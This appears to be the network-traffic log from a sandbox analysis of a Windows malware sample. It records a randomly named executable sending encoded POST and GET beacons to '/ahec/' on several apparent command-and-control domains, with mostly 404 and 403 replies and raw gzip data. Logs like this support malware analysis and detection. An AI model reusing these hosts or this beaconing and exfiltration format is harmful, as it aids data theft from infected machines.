                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:50:37 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49742 | 74.208.236.181 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2023 14:50:40.213336945 CET | 10861 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.user4deepriver.com
                                                                                                                                                            Origin: http://www.user4deepriver.com
                                                                                                                                                            Referer: http://www.user4deepriver.com/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 10289
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Ascii: XveXHZvx=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
                                                                                                                                                            Dec 8, 2023 14:50:40.387168884 CET | 580 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:50:40 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Content-Encoding: gzip


                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                            4 | 192.168.2.4 | 49743 | 74.208.236.181 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                            Dec 8, 2023 14:50:42.900471926 CET | 476 | OUT | GET /ahec/?XveXHZvx=9k2v98v8fW7x5mt2TD9N5hM0Gp49wMZ6NgJCH+u8B3tf6gDcFaFwcfLjsp7tbCeN6M+Gl5HR8oN4IorBb0pnZhULhTE/SFE2Bw==&l4xX=rDStpH0He HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Host: www.user4deepriver.com
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Dec 8, 2023 14:50:43.073848963 CET | 770 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 626
                                                                                                                                                            Connection: close
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:50:42 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                            5 | 192.168.2.4 | 49744 | 104.21.18.253 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                            Dec 8, 2023 14:50:48.439062119 CET | 732 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.poria.link
                                                                                                                                                            Origin: http://www.poria.link
                                                                                                                                                            Referer: http://www.poria.link/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 189
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Ascii: XveXHZvx=FXiEFcnYTh5TWB+h9a01KtfYux9CWBqeibTyeLFE+I7ojhbMbrO47DIqdXYvDoS2tzpIFUzcZHgnGW7ds8Fp3VC2JnMccgrv/DguLtY5zbt8hRWNP/6o9GSslkDjZkCrmEbDGbAIWtsMxFJi0a3SYdCIj1BwzkuslR9fK6UsLhjBiMBPZA==
                                                                                                                                                            Dec 8, 2023 14:50:48.715878010 CET | 1029 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:50:48 GMT
                                                                                                                                                            Content-Length: 353
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                            Cache-Control: private, no-cache, no-store, max-age=0
                                                                                                                                                            Expires: Mon, 01 Jan 1990 0:00:00 GMT
                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eMEaukHhjCSQTUs92yM8CbjGawTCEIkCp0dPRmAgW2QYf9LHBUsUfl7Zui%2Bb7mZS6FkShsiwZ0FMTgfbbC8m808x%2BPFvDJ%2BxAHOB27060BLi0PxGOxzKMOB8ZYHYBKdKHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 83257ac11fa79aeb-MIA
                                                                                                                                                            alt-svc: h3=":443"; ma=86400


                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                            6 | 192.168.2.4 | 49745 | 104.21.18.253 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                            Dec 8, 2023 14:50:51.092530966 CET | 752 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.poria.link
                                                                                                                                                            Origin: http://www.poria.link
                                                                                                                                                            Referer: http://www.poria.link/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 209
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Ascii: XveXHZvx=FXiEFcnYTh5TXhih/5c1LNfXgR9CEBrZicbyeP1U+drogBrMava44DIqT3YqHoShtzU1FVPcZHknGWLdtP9q1FC0c3MeSArv/DguLtMTzbV8hhmNOdCv+GSjsEDjdkCvmEbbGatjWogMxE5i0vbRDtCKsVAZ8Vyinx8qLNcTKG6ujZtce7ZC2U3KU9Q1nSjWAjCYuq8=
                                                                                                                                                            Dec 8, 2023 14:50:51.383552074 CET | 1033 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:50:51 GMT
                                                                                                                                                            Content-Length: 353
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                            Cache-Control: private, no-cache, no-store, max-age=0
                                                                                                                                                            Expires: Mon, 01 Jan 1990 0:00:00 GMT
                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mStufdvmE9kAgPDd2Z0xr44JqzWQf0WqGwjgkT%2FxaItiwU9PhR4%2Bwxo3VRLk2WtuE1Evb%2BcXdYiDphX3lFuOBBcE8gHRWEeOfZNT5X3McUp4tJ472R8toMypEB%2BK%2B11YXg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 83257ad1ae1667cf-MIA
                                                                                                                                                            alt-svc: h3=":443"; ma=86400


                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                            7 | 192.168.2.4 | 49747 | 104.21.18.253 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                            Dec 8, 2023 14:50:53.749476910 CET | 10834 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.poria.link
                                                                                                                                                            Origin: http://www.poria.link
                                                                                                                                                            Referer: http://www.poria.link/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 10289
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Dec 8, 2023 14:50:54.028893948 CET | 1031 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:50:53 GMT
                                                                                                                                                            Content-Length: 353
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                            Cache-Control: private, no-cache, no-store, max-age=0
                                                                                                                                                            Expires: Mon, 01 Jan 1990 0:00:00 GMT
                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5gkaYz%2F18GeIyn8dhQOH4sA2NQuuc%2F2FVZDrbX2Vrhp0oa5zSiDrLHxV2loRl78yGjEV09DGsWs29kLm7plQZbpOZ8GKp%2BjJtuKkcP4S6kAINFucOfLa0mp27W3%2BpNY7oA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 83257ae23957495e-MIA
                                                                                                                                                            alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49748 | 104.21.18.253 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2023 14:50:56.404686928 CET | 467 | OUT | GET /ahec/?XveXHZvx=IVKkGpXtV1toVTOD34k8KODusBBzLXjGifHJVqVOgN7K+V/6a9WE/CA4RHgfE4yJ8GdRU2XQNCMfR2HSu9NJz1b7R1h7bgr87Q==&l4xX=rDStpH0He HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Host: www.poria.link
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Dec 8, 2023 14:50:56.686069965 CET | 1272 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:50:56 GMT
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                            Cache-Control: private, no-cache, no-store, max-age=0
                                                                                                                                                            Expires: Mon, 01 Jan 1990 0:00:00 GMT
                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GvIm%2FfOCJu80AE09johpDoC0vPNlTq2pOycE5hCMsHfepwfpVoDz7ncCV2FyFw3s2BKTsr7ZAdhpSa9327B1tl8Z8XbIILoTeC%2F%2FCI2NbmmzjVY92UwpbskHia1ZsFUveQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 83257af2de4c258e-MIA
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            Data Ascii: 25e<html><head><title>Not Found</title></head><body><center><br><br><br><br><br><b><big>Not Found</big></b><br><br><table cellpadding=10 cellspacing=0 width=400 border=1><tr><td>Your domain could not be found in our forwarding or stealth forwarding tables. <br><br>If you recently set your name servers, please wait a few minutes and try again. Sometimes restarting your browser helps.<br><br>If you require further assistance, please visit our main site at <a href='http://www.dynadot.com'>www.dynadot.com</a>.</td></tr></table><br><br><img src='http://parkcloud.dynadot.com/logo.gif'></center></body></html>
Dec 8, 2023 14:50:56.686326027 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49749 | 37.140.192.89 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2023 14:51:02.564663887 CET | 747 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.makeinai.online
                                                                                                                                                            Origin: http://www.makeinai.online
                                                                                                                                                            Referer: http://www.makeinai.online/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 189
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Ascii: XveXHZvx=Bw1JIdbMW2KoJUK+Be6JyXOVPyCe9oohVMIsw30X2yXi/kt6sRhrlPU/MVxeY0gnXsff8+hr+X4NeC26RX+9lnOXYeCIAeV7uhlBZ/rYUdpLc+Do917HQJUwmktEfPSUlSuOLt7wpsP19h2myCwIhq8JxIEiIWGvRMper8S0adWyJzpz7Q==
Dec 8, 2023 14:51:02.846950054 CET | 1286 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                            Server: nginx
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:51:02 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            ETag: W/"64f9f107-377d8"
                                                                                                                                                            Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49750 | 37.140.192.89 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2023 14:51:05.640383959 CET | 767 | OUT | POST /ahec/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.makeinai.online
Origin: http://www.makeinai.online
Referer: http://www.makeinai.online/ahec/
Cache-Control: no-cache
Content-Length: 209
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Dec 8, 2023 14:51:05.924487114 CET | 1286 | IN | HTTP/1.1 403 Forbidden
Server: nginx
Date: Fri, 08 Dec 2023 13:51:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
ETag: W/"64f9f107-377d8"
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49751 | 37.140.192.89 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2023 14:51:08.451260090 CET | 10849 | OUT | POST /ahec/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.makeinai.online
Origin: http://www.makeinai.online
Referer: http://www.makeinai.online/ahec/
Cache-Control: no-cache
Content-Length: 10289
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Dec 8, 2023 14:51:08.737591028 CET | 1286 | IN | HTTP/1.1 403 Forbidden
Server: nginx
Date: Fri, 08 Dec 2023 13:51:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
ETag: W/"64f9f107-377d8"
Content-Encoding: gzip
                                                                                                                                                            Data Ascii: u!eC;sEl=w$*Y?#}4;3?%ZR='@uQb)v5YG(I~.';<N6Nz$*jvn^_aVa5Nmz]R0T=j0d9v0E|9-Eq=%l)MF1qax
                                                                                                                                                            Dec 8, 2023 14:51:08.737967968 CET1286INData Raw: 83 53 15 67 c3 f2 c9 d2 89 2b ff 3d ce 61 5c 32 52 13 f6 be 18 25 f3 37 91 bb 82 59 fd 27 70 41 ae 5c cf 8d ee 1e 52 79 0b e9 d1 98 65 fd 65 4e c4 7b d5 18 81 63 6b c7 50 96 c3 8e 63 87 ce c0 5d 0f fc 6d b4 23 73 09 c3 63 83 1f 31 7f bb ab 3f c5
                                                                                                                                                            Data Ascii: Sg+=a\2R%7Y'pA\RyeeN{ckPc]m#sc1?g\I6KzQqCua'c'{23^bx%)orLBPIzIDVdB(^ -.,#4~>#FU!e%_RM@&D=~^5tW^b{%QV68o}
                                                                                                                                                            Dec 8, 2023 14:51:08.738065958 CET1286INData Raw: ad 53 c1 60 6e 1e 8f 19 da 7d 2c 49 f1 02 dd 83 d5 0f c0 db 83 f5 0f 80 da cc 0d 3c ec 19 33 9b c0 5d d9 c1 dd 7d f9 bd 09 a2 38 13 4d b5 ae 42 56 82 f8 28 04 7a 5a 80 50 53 38 7e 96 40 15 8f b9 3d d2 eb 78 c4 8f 28 a8 ac 67 1b 86 5c 57 6f b0 76
                                                                                                                                                            Data Ascii: S`n},I<3]}8MBV(zZPS8~@=x(g\WovnRlw?46-T,XhlDUvU}OdVxoMm-?(^]#3,5UJ1EY!9$cE->i*MoUWeA!
                                                                                                                                                            Dec 8, 2023 14:51:08.738368034 CET1286INData Raw: a0 c5 7a e9 e3 b8 f3 4d 36 5a bd 4a 2c df e4 e4 e9 ca 75 ac 0f 34 5d 2f b7 9c 1e 8a 9f 36 18 53 1f cf f5 56 2f 07 cb 37 38 79 c6 78 81 e3 81 76 8e ca dd bc 72 af 85 32 9d b2 c8 a9 07 da 09 b5 24 79 a6 70 be 2d 15 1d d8 d3 bc 03 dd ad 10 12 3e 48
                                                                                                                                                            Data Ascii: zM6ZJ,u4]/6SV/78yxvr2$yp->H?r%G\U'T_dR!VIV0kgWsYe,BNP m\zAC9g3<_ms+E}&w3bY!Tb
                                                                                                                                                            Dec 8, 2023 14:51:08.738459110 CET1286INData Raw: 8e 4f b6 88 a4 cf bc 7d 88 f9 c6 5f 87 1e 99 87 45 76 2e 60 6c 56 4e ed 5b 9b d5 dc b2 cf 73 cb 37 55 28 17 de df 9f 03 1c 32 fd 3a a5 5b 5d e6 ba 7b 34 ed c9 1d dd f4 41 b8 39 66 bc 32 4c 9e 60 5b 2f c2 fd f4 33 9d 3a a5 8f 5b 66 9a 3e 45 f6 e4
                                                                                                                                                            Data Ascii: O}_Ev.`lVN[s7U(2:[]{4A9f2L`[/3:[f>E*W_z)2fO3s`\z'Vk'wOG)>3[`+e,U=Tfy]lNhs\3<((5a
                                                                                                                                                            Dec 8, 2023 14:51:08.739259958 CET1286INData Raw: 86 9a a6 75 c4 81 6e 0e 14 71 a8 aa 2a 1e e9 66 48 3f 34 38 ea d0 ef 19 15 84 da f0 b3 c3 0a 76 e8 5a 38 48 7f b1 c2 1f 9e 9f b3 be ce dc 60 e6 39 e5 de ce de 5b cf 59 5b e0 f8 2e 3e 36 9e 77 02 eb b9 2e 0d 65 51 4e 08 e4 85 f5 ed b7 df 32 49 8d
                                                                                                                                                            Data Ascii: unq*fH?48vZ8H`9[Y[.>6w.eQN2I('eh<gMJks(*@2#?;O!9%|*JDj+( Pe:Gz%XT+$IUWT?Pp*#X?|oC;645g*Aq
                                                                                                                                                            Dec 8, 2023 14:51:08.739377975 CET1286INData Raw: 8b 03 75 c1 08 13 5c d7 b1 77 20 59 b4 33 e2 c8 08 61 89 c0 a5 43 03 eb 05 67 74 5a b9 0c 05 9d 26 13 87 0a 5d 0a c3 40 c7 40 87 d1 95 d0 62 ca 60 83 35 e8 0d ac 9f b0 1c c3 a7 6c a0 af 23 2b e8 8a 28 84 2f 68 71 90 45 30 7f b0 1e 82 d4 c0 a2 c1
                                                                                                                                                            Data Ascii: u\w Y3aCgtZ&]@@b`5l#+(/hqE0?4,^pl_`4UV/6y+5s'dp#jZB3`/C~92u02s2p"T5iP+0Awd_FudDRZ4i&p<$bPE{ |
                                                                                                                                                            Dec 8, 2023 14:51:08.739470959 CET1286INData Raw: 67 a9 84 fe 61 a5 ea 60 f4 d0 29 1e 61 84 09 b7 51 60 8a ea 36 4e 0c 59 eb c4 5f 24 08 05 1d 26 84 4d b2 e9 01 30 20 ef 55 c3 d0 12 46 09 75 09 e3 63 d4 4b 99 42 82 06 6d 3a 89 60 bf d0 01 42 b9 23 1c c3 58 fb 60 48 3f 45 d4 46 2c ae e0 74 05 8d
                                                                                                                                                            Data Ascii: ga`)aQ`6NY_$&M0 UFucKBm:`B#X`H?EF,t6F:#FNeh9u-&$"m_=QPE<BA(B@9TGr}o8ZqZ1p}3"4\hR!&RAdf0m L^(WGn`74]@H<a
                                                                                                                                                            Dec 8, 2023 14:51:08.739547014 CET1286INData Raw: 8d d5 5a 2a d2 8d 64 2c 07 8a f4 a1 7a 13 53 14 bf 36 46 7f 88 4d 3a e6 dc 76 24 dc 99 c7 cd 20 5d c1 94 3b 53 5d d2 76 7f 4d fd 74 13 d4 c4 54 0f 1d e3 8b 7f 84 5a 8a 6e ab 2a 6d 6d c5 5f b4 95 81 d9 19 18 94 9d 89 14 18 67 3b 31 22 6e 9c 9a 94
                                                                                                                                                            Data Ascii: Z*d,zS6FM:v$ ];S]vMtTZn*mm_g;1"no5,esn$f@Sbjq6I!8P4`7:}d&li_YQBk0Kg(h51nU<})MS:&G
                                                                                                                                                            Dec 8, 2023 14:51:09.017349958 CET1286INData Raw: fe 56 51 ca b7 c3 e0 ed 84 72 27 9e 76 26 0a 19 d3 b6 4c cd a0 4f f3 6b 95 ee b5 60 9f 98 01 06 33 73 04 eb 84 3e d4 fe 88 93 01 6f e8 10 55 98 bc a6 22 79 54 a3 43 9f 76 b1 1e bb 06 96 c4 94 59 e9 1b bc 2f 5c a1 29 a7 fe 0c c7 ba 61 d8 0a dd 54
                                                                                                                                                            Data Ascii: VQr'v&LOk`3s>oU"yTCvY/\)aT><M8d(}u3 ?(DUa7g'yC@*}4_}WKB~|lR)s1%rbEA/O34Pksj6fVIo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49752 | 37.140.192.89 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2023 14:51:11.265685081 CET | 472 | OUT | GET /ahec/?XveXHZvx=MydpLo7WWyKQN3KVLs+v6WaBMDmZ37UnbscI2lMT8W/M5j1pmQABg8QwQndiOgkeUarM8fNOhSJ3XzKDSkOkoUWHW96MRNJ3hQ==&l4xX=rDStpH0He HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.makeinai.online
Connection: close
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Dec 8, 2023 14:51:11.548007011 CET | 1286 | IN | HTTP/1.1 403 Forbidden
Server: nginx
Date: Fri, 08 Dec 2023 13:51:11 GMT
Content-Type: text/html
Content-Length: 227288
Connection: close
Vary: Accept-Encoding
ETag: "64f9f107-377d8"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49753 | 131.153.147.90 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2023 14:51:18.296947956 CET | 753 | OUT | POST /ahec/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.instantconvey.com
Origin: http://www.instantconvey.com
Referer: http://www.instantconvey.com/ahec/
Cache-Control: no-cache
Content-Length: 189
Content-Type: application/x-www-form-urlencoded
Connection: close
User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Data Ascii: XveXHZvx=fGFjl9hS4wS+iTIjzNBxOxFUw9O2cA2PVeH1ea1wxvFamxfy1FP7EyWHiBlbUqgKrX+XkhaRjeUM7e52IhDrUXgg8taayFa2P+zE+/pzV7wOiZGtFItz0kBafnZWaf8FymYXU6bNZLog7Nf96s5XO6C5sHcYcm3RgNNItFY1+GqT31z2OQ==
Dec 8, 2023 14:51:18.456036091 CET | 479 | IN | HTTP/1.1 404 Not Found
Date: Fri, 08 Dec 2023 13:51:18 GMT
Server: Apache
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                            14 | 192.168.2.4 | 49754 | 131.153.147.90 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
